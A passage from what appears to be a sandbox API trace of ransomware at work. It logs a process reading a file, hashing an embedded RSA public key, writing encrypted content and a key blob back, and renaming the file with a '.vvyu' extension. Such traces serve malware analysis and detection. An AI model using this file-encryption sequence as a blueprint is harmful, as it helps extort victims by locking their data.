lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.867] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1708a, lpOverlapped=0x0) returned 1 [0183.868] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.868] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.868] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.868] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.869] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.869] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.869] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.869] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.869] GetLastError () returned 0x0 [0183.869] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.869] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.870] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.870] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.870] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.870] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17090) returned 0x2d43778 [0183.871] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31018 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7c8 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31060 [0183.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7e0 [0183.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0183.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.872] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e828 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e810 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.874] GetCurrentThreadId () returned 0x264 [0183.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce800 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.875] GetCurrentThreadId () returned 0x264 [0183.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0183.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e828 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e888 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8a0 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e840 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e810 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.879] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7f8 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e7e0 | out: hHeap=0x6a0000) returned 1 [0183.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31060 | out: hHeap=0x6a0000) returned 1 [0183.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0183.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0183.887] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x17085, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x17085, lpOverlapped=0x0) returned 1 [0183.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.889] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1708a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.889] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.889] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.889] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0183.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0183.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.890] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.891] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.891] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.891] CloseHandle (hObject=0x584) returned 1 [0183.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0183.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.894] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\iJReKTqGLBvZe.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ijrektqglbvze.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\iJReKTqGLBvZe.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ijrektqglbvze.flv.vvyu")) returned 1 [0183.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.897] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.900] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: 